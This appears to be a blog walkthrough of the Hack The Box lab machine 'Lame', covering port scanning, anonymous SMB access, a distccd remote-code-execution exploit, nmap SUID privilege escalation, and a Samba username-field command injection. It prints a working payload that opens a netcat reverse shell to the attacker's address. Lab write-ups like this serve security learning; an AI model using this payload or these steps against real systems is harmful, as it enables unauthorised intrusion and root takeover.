Hack The Box: Beginner Track - Lame


This is the first machine of the Hack The Box Beginner Track: “LAME”.


Lame

box arch

The box is tagged “injection”, “CMS exploit”, “Linux”, “Web”, “PHP” and “Password Reuse”.

Enumeration

We run sudo nmap -sC -sV <IP> and find four open ports: 21, 22, 139 and 445.The FTP server on port 21 allows anonymous login, so let’s try that first to catch the low-hanging fruits. Meanwhile we can run a nmap full port scan (-p), which returns a fifth open port on 3632 (distccd v1).

box arch

The FTP server seems to not include any files, and it is also not possible to upload files from our side (error 553 Could not create file.).


Next, let’s enumerate the SMB client, which allows anonymous login as well.

box arch

We see a share “tmp” which might be accessible. We can view the share’s files with smbclient \\\\10.129.136.236\\tmp:

box arch

From the folder we can download two files: vgauthsvclog.txt.0 and .X0-lock. The rest is not accessible with our anonymous account. We try the same with the opt-share, but this one does not let us in anonymously.

The two files show some log data of “VGAuthService” and the X0-lock file contains a single number: 5703.

box arch

I’m not sure how to use these ones, so let’s check out the last open port with the “distccd”-service.

Googling for the term “disccd v1” immediately throws several exploits, for example this Github-link1 which apparently leads to Remote Code Execution.


Initial Foothold

After downloading and running the Github exploit, I received a shell (note that it needs to be run with python2 and not python3). We end up as user daemon and in the /tmp directory to which we already had access via smbclient.

On the machine, we find four users in the home directory: ftp, makis, service and user. In the “makis”-directory, we find a user flag.

box arch

Since the daemon user has a shell, I tried to create SSH keys, but unfortunately the user’s home directory ("/usr/sbin:/bin/sh") is not writable. But we can put files via the tmp-smbclient. So let’s add the linpeas-script and run it for enumeration.


Privilege Escalation

Linpeas gives us a friendly red-orange indication that the SUID bit on nmap is exploitable, which is confirmed by GTFOBins. I followed the instructions in this blogpost2 and got a root shell!

box arch


Alternative Solution

After I finished the box, I watched a youtube walkthrough and learned that there was an even simpler way to get directly root access: We can get RCE directly via the SMB server without any steps in between.

The bug inside the SMB version is that we can inject arbitrary commands into the username field while we are attempting an SMB connection. This is all we need to type: logon "./=`nohup nc -e /bin/sh 10.10.16.28 4444`". With this, we get root access.

box arch


  1. https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855 ↩︎

  2. https://vk9-sec.com/nmap-privilege-escalation/ ↩︎